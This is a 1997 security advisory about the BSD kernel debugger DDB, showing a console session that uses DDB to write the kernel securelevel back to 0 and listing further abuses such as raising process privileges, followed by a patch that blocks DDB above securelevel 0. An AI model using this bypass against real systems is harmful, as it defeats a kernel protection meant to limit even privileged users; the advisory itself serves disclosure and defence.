2nd Sep 1997 [SBWID-77]
COMMAND
DDB
SYSTEMS AFFECTED
FreeBSD, many other BSD stuff
PROBLEM
Brian Mitchell posted following. DDB is the kernel debugger. It
lets you debug the kernel upon a panic or when you wish to enter
it via a key sequence on the console. There appears to be a slight
problem though, you can use DDB to lower the securelevel of the
system. The following shows one example:
# sysctl -w kern.securelevel=10
kern.securelevel: 0 -> 10
# Debugger("manual escape to debugger")
Stopped at _Debugger+0x35: movb $0,_in_Debugger.118
db> write securelevel 0
_securelevel 0xa = 0
db> cont
# sysctl kern.securelevel
kern.securelevel: 0
#
Also you can a) raise your privelege level (walk the process
list, find the cred stuff for the appropriate process, and change
it, b) make the machine panic c) remove the code that prevents
you from doing any number of things while at a higher securelevel,
d) remove the code that prevents you from removing the code that
prevents you from doing things at a higher securelevel, etc.
SOLUTION
The most straightforward solution to this is to simply not allow
DDB to be run when securelevel > 0. Enclosed is a simple patch
against 2.2.1 to do this. Note that FreeBSD runs with
securelevel -1, while that's not case with others so apply this
solution only if understund what's what are you doing. Anyway,
removing ddb would be also solution.
*** i386/i386/db_interface.c Sat Aug 30 08:57:36 1997
--- i386/i386/db_interface.c.new Sat Aug 30 09:00:43 1997
***************
*** 241,246 ****
--- 241,256 ----
/*
* XXX
+ * Do nothing if the securelevel is > 0. The justification
+ * being that DDB can be used to lower the securelevel, so
+ * if we run > 0, we should not be able to run DDB at all.
+ * Modifying DDB to be securelevel friendly is not an option.
+ */
+ if(securelevel > 0)
+ return;
+
+ /*
+ * XXX
* Do nothing if the console is in graphics mode. This is
* OK if the call is for the debugger hotkey but not if the call
* is a weak form of panicing.